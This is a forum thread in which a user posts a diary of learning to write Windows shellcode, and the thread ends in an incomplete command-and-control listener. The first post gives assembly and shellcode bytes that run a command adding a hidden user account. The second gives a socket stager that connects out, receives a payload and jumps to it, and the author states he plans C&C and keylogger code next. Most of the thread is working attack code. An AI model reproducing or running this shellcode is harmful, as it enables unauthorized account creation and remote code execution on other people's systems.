Results 1 to 3 of 3

Thread: My shellcode trail and error diary

  1. #1
    Just burned his ISO
    Join Date
    Jan 2010

    Default My shellcode trail and error diary

    I'm trying to learn how to write shellcode. I'm planning on writing my trails and errors in some type of diary
    and hopefully it can help others.

    The software that I'm using is Borland C++ with CodeBlocks IDE(TASM), Windows Server 2k3

    Using the Winexec function, passing the parmeters of WinExec("cmd.exe /c net user laser laserpass /ADD",0);
    IDA disambly

    asm xor esi ,esi;
    asm push esi;
    asm mov esi ,0x4444412F;	This group of asm is the string "cmd.ex....", writen from the right side to left
    asm push esi;			After move 4 charcters into esi, esi gets loaded onto the stack to be read latter
    asm mov esi ,0x20737361;	We have to take along all the data that the shellcode will need, stopping us from
    asm push esi;			just declareing char string[50] = "cmd...."
    asm mov esi ,0x70726573;
    asm push esi;
    asm mov esi ,0x616C2072;
    asm push esi;
    asm mov esi ,0x6573616C;
    asm push esi;
    asm mov esi ,0x20726573;
    asm push esi;
    asm mov esi ,0x75207465;
    asm push esi;
    asm mov esi ,0x6E20632F;
    asm push esi;
    asm mov esi ,0x20657865;
    asm push esi;
    asm mov esi ,0x2E646D63;
    asm push esi;
    asm mov ecx ,esp;		Place the string directly into the first parm of Winexec(#2), results in it trying
    				to find the instruction or data at the address of string(0x2E646D63) rather than 0012FF7C
    				Copying the stack pointer and moving it into ecx, we well beable to refence it latter
    asm xor eax ,eax;
    asm push eax;   		This part zeros out eax and push it onto the stack at 0012FF78 , for the second parm
    asm mov ebx ,ecx;   		This moves the old stackpointer(above) into ebx and push that as the first parm
    asm push ebx;			0012FF74 dd    12FF7Ch
    asm mov ebx ,0x77ea411e;     	Kernel32 is in all windows programs serach using a disambly the address of WinExec is
    asm call ebx;			at 0x77ea411e . If you create a program that calls WinExec in C the function will show
    				up in the functions table.
    0012FF54 dd    407116h ; __create_lock+62
    0012FF58 dd    40BDB0h ; .data:CriticalSection
    0012FF5C dd    12FF90h ; Stack[00000A48]:retaddr
    0012FF60 dd    406C8Bh ; sub_406C7C+F
    0012FF64 dd    40BD90h ; .data:___exit_lock
    0012FF68 dd    40AC68h ; .data:aCreatingAtexit
    0012FF6C dd    406BA5h ; __init_exit_proc:loc_406BA5
    0012FF70 dd          0
    0012FF74 dd    12FF7Ch
    0012FF78 dd          0
    0012FF7C dd  2E646D63h ; cmd.
    0012FF80 dd    657865h ; exe
    0012FF84 dd    4090DCh ; .data:off_4090DC
    0012FF88 dd  7FFD4000h
    0012FF8C saved_fp dd    12FFB8h ; Stack[00000A48]:saved_fp
    0012FF90 retaddr dd    406E02h ; __startup+172
    0012FF94 argc dd 1
    To test the shellcode a C program like below

    #include <stdio.h>

    main() {

    char scode[] = "\x56\x33\xf6\x56"
    "\xbe\x2f\x41\x44\x44\x56\xbe\x61\x73\x73\x20\x56\ xbe\x73\x65\x72"
    "\x70\x56\xbe\x72\x20\x6c\x61\x56\xbe\x6c\x61\x73\ x65\x56\xbe\x73\x65\x72\x20\x56"
    "\xbe\x65\x74\x20\x75\x56\xbe\x2f\x63\x20\x6e\x56\ xbe\x65\x78\x65\x20\x56\xbe\x63"
    "\x6d\x64\x2e\x56\x33\xf6\x8b\xcc\x33\xc0\x50\x33\ xdb\x8b\xd9\x53\x33\xdb\xbb\x1e"
    "\x41\xea\x77\xff\xd3\x33\xdb\x33\xc0\x33\xc0\x5e\ x5b\x5d\xc3\x90";

    int (*func)();
    func = (int (*)()) scode;

    My next project will be a stager and C&C, so I can pass shellcode above to get executed
    Last edited by pigtail; 01-24-2010 at 11:57 PM. Reason: Readibility edit

  2. #2
    Just burned his ISO
    Join Date
    Jan 2010

    Default Re: My shellcode trail and error diary

    Trying to create a stager is alot more difficult than I thought at first, these link were of great help
    "" & "", I learnt that a function(in C) like func(string[40]); to use it in a shellcode
    you move esp by 40d(asm sub esp ,40), and then push the address of the bottom. Asm doesn't understand static buffers or struct, but just makeing room for the space(int one = 0x04)
    Learnt that most function that don't return a value, will not change to much of the data in the register when
    it returns

    asm xor eax ,eax;
    asm xor ebx ,ebx;
    asm mov esi ,0x4C4C44; these three hex values are WSOCK32.DLL back to front
    asm push esi;
    asm mov esi ,0x2E32334B;
    asm push esi;
    asm mov esi ,0x434F5357;
    asm push esi;
    asm mov ebx ,esp; This places the pointer to the buffer into ebx then onto the stack,
    asm push ebx; which we pass to loadlibary
    asm mov ecx ,0x77e41dc6;
    asm call ecx;

    asm sub sp ,400; These is above (buffer, struct), it holds 400d , i'm still trying things
    asm push esp; and I think it would be better to have esp, to stop esp 0x1234 from wrapping around
    asm push 0x101; if possable . version for communcation
    asm mov ecx ,0x71c04f3b; WSAStartup address in wsock32
    asm call ecx;

    asm xor eax ,eax;
    asm push eax; pass 2,1,0,0,0,0 pretty much copyed pasted from metasploit, changed it around
    asm push eax; instead of inc eax , sub 0xffffffff = +1
    asm push eax;
    asm push eax;
    asm sub eax ,0xffffffff;
    asm push eax;
    asm sub eax ,0xffffffff;
    asm push eax;
    asm mov ecx ,0x71c0410c; Calls socket
    asm call ecx;
    asm mov ebx ,eax; returns the handle stores it in ebx.

    asm push 0x0100007f; address 127 = 7fh Are network + comes in handy
    asm push 0xb3150002; port 5555; plus 0002 for AF_INET
    asm mov ecx ,esp; declares the struct for connect, uses raw data, means no need for inet/htons calls
    asm push byte 0x10;
    asm push ecx;
    asm push ebx;
    asm mov ecx ,0x71c0446a; connect
    asm call ecx;

    asm xor eax ,eax;
    asm mov edi ,2000; 2000 bytes for our shell code used for length
    asm sub esp ,edi; these two commands makes space then copys the bottom address into ebp
    asm mov ebp , esp;
    asm push eax; flags = 0
    asm push edi; length = 2000
    asm push ebp; pointer to bottom of buffer
    asm push ebx; socket handle from above.
    asm mov ecx ,0x71bb1120; recv
    asm call ecx;

    asm jmp esp; Our buffer was create before the values that get taken of the stack becasue
    of the recv function, the shellcode that was recived should be at the esp value.

    Still have to learn some more, without need help from other web sites.
    I'm going to try and work on fork() block, so the shellcode that gets sent will have its own area to run,
    which should help on the keylogger code next.

    post two.......two

  3. #3
    Just burned his ISO
    Join Date
    Jan 2010

    Default Re: My shellcode trail and error diary

    This is the Command and Control centre that I will be useing
    #include <stdio.h>
    #include <windows.h>
    #include <stdlib.h>
    #include <string.h>
    #include <winsock2.h>
    main() {
    WORD wVersionRequested;
    WSADATA wsaData;
        wVersionRequested = MAKEWORD(2,2);
    SOCKET m_socket;
    m_socket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    sockaddr_in service;
    service.sin_family = AF_INET;
    service.sin_addr.s_addr = inet_addr("");
    service.sin_port = htons(5555);
    bind(m_socket,(SOCKADDR*)&service, sizeof(service));
    listen(m_socket, 10);
    m_socket = accept(m_socket,NULL,NULL);
    //unsigned char scode[] =
    //"\x41\xea\x77\xff\xd3\x33\xdb\x33\xc0\x33\xc0\x5e\x5b\x5d\xc3\x90";  //96 bytes
    unsigned char scode[] =
    //recv(m_socket,scode, 300,0);

Similar Threads

  1. Bt- 4 serieas problem error error
    By lenien in forum Beginners Forum
    Replies: 2
    Last Post: 01-18-2010, 06:52 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts